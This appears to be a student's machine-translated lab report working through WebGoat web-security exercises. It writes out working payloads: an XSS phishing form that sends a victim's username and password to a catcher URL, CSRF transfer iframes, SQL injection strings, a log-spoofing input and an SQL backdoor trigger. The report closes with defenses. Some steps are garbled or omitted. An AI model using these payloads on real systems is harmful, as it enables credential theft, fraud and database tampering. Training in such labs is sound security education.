20155331 Web Security Foundation practice of cyber confrontation

20155331 "Cyber Confrontation" EXP9 Web security basic experimental process Webgoat

Enter Java-jar Webgoat-container-7.0.1-war-exec.jar in the terminal to turn on webgoat.

Open the browser, enter localhost:8080/webgoat in the Address bar to open webgoat, use the default account password to log in.

XSS attack phishing with XSS cross-site scripting phishing attack

Arbitrarily constructs the HTML content that the user currently browses, and can even simulate the user's current operation. The experiment here is an attack that gets a username and password.

Inject the code inside the text box:

</form><script>function hack(){ XSSImage=new Image;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("You‘ve been attacked ... Your Identity information were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR>  <H2>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" name="user"> <br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

Jump out of an attacker-written form that fills in a user name and password

Successful attack, get user name and password

Reflected XSS-reflex XSS attack

In the Code box, enter

Stored XSS Attacks Storage type XSS attack

Open stored XSS Attacks, enter in message

CSRF attack Cross Site Request forgery (CSRF)

View the SRC and menu values in the parameters on the right side of the page

message box, enter the code:

Submit the DZDD as a link:

Click on the name to view the user's operation information, attack success

CSRF Prompt By-Pass

Look at the SRC and menu values in the parameters on the right side of the page, enter the number in the Title box, enter the code in the message box:

<iframe src= "attack? Screen=512&menu=900&transferfunds=1 ">
<iframe src= "attack? Screen=512&menu=900&transferfunds=confirm ">

Submit the epigenetic into a link 5331:

Click on the name to view the user's operation information, attack success

SQL injection Attack SQL string injection

Use SQL injection to view ID card numbers, enter Smith as prompted, and query all information named Smith

Can be found, this makes it easy to get the ID card number named Smith

Enter ' or 1 = ' 1, make up the wing-true

Numeric SQL Injection

You can see that this selection box is a drop-down box that cannot be modified, so you can use the Burpsuite to grab the package to modify

Open Burpsuite, select Proxy->options->add Add a port in Burpsuite, set the bound port to 5331, confirm that you will add a line under Options, tick the newly formed line


Click on the browser, more tabs, select preference,advanced, select the Network tab, and on the connection line choose Settings

Set up the proxy server and port in the popup window

After setting up the agent to go back to the topic page, click Go, then enter the Burpsuite in turn select Proxy->intercept, you can see the package has been caught:

Right-select Send to Repeater, enter Repeater page tab, select params to change the value of station into 101 or 1=1, click Go to Run, view right code can see the SQL statement in the package is select * FROM Weather_ Data WHERE station = 101 or 1=1

Log Spoofing

In the User Name text box, enter%0d%0alogin succeeded!admin to achieve the spoof login effect, crack success:

Lab:sql Injection of Stage 1

Bypass authentication with string SQL injection. Using the SQL injection log as the boss (' Neville ') does not use the correct password. Verify that the Neville configuration file can be viewed and all features available

Select the user named Neville Admin user, enter the eternal "or 1=1--for the password, the input found the password box text length set not enough to construct the permanent, the right button->inpect Element with Firebug, Manually modify the password length to 11 (never-True length)

Login successful

Database backdoors

Executes multiple SQL statements using string SQL injection. The first one is the system, the second one is yours. The account ID is 101. This page allows you to see your password, ssn and salary. Try to inject another update to update the salary to something higher

Enter 101 to get the user's information:

Input INJECTION statement: 101; Update employee set salary=100000 to see a rise in wages.

Use Statement 101; CREATE TRIGGER Mybackdoor before INSERT on employee for each ROW BEGIN UPDATE employee SET email= '[email protected] ' WHERE userid = New.userid Creates a backdoor that sets all the mailboxes and user IDs in the table to my:

Basic questions answer SQL injection attack principle, how to defend? Attack principle

SQL injection means that the Web application does not judge the legality of user input data, and an attacker can add additional SQL statements at the end of a pre-defined query statement in a Web application in order to deceive the database server into executing unauthorized arbitrary queries, thereby further obtaining the corresponding data information.

Prevention

1, the ordinary user and the system administrator user's permission to have the strict distinction.

2, forcing the use of parameterized statements.

3, strengthen the validation of user input.

4. Use the security parameters that are available from the SQL Server database.

5, if necessary, use professional vulnerability scanning Tool to find the point that may be attacked.

What is the principle of XSS attack and how to defend it? Attack principle:

For cross-site scripting attacks, XSS attacks are similar to SQL injection attacks, injecting attack code into a Web page or database store, which is triggered by the ability to access Web pages or perform Web pages.

Defense methods:

For user input attacks, only valid values are allowed, and other values are filtered out.

CSRF attack principle, how to defend? Attack principle:

To achieve some illegal purposes, such as transfer, payment, etc., by hijacking a session, forging identity, etc.

Defense methods:

Using a verification code, the form attached random values to prevent impersonation, in the user's privacy data as far as possible encryption, encryption transfer

Experimental summary

Feel normal online danger or quite a lot of, can be achieved through various methods of attack, so in the website programming should be the user input information to make a reasonable judgment, so as to ensure user security.

20155331 Web Security Foundation practice of cyber confrontation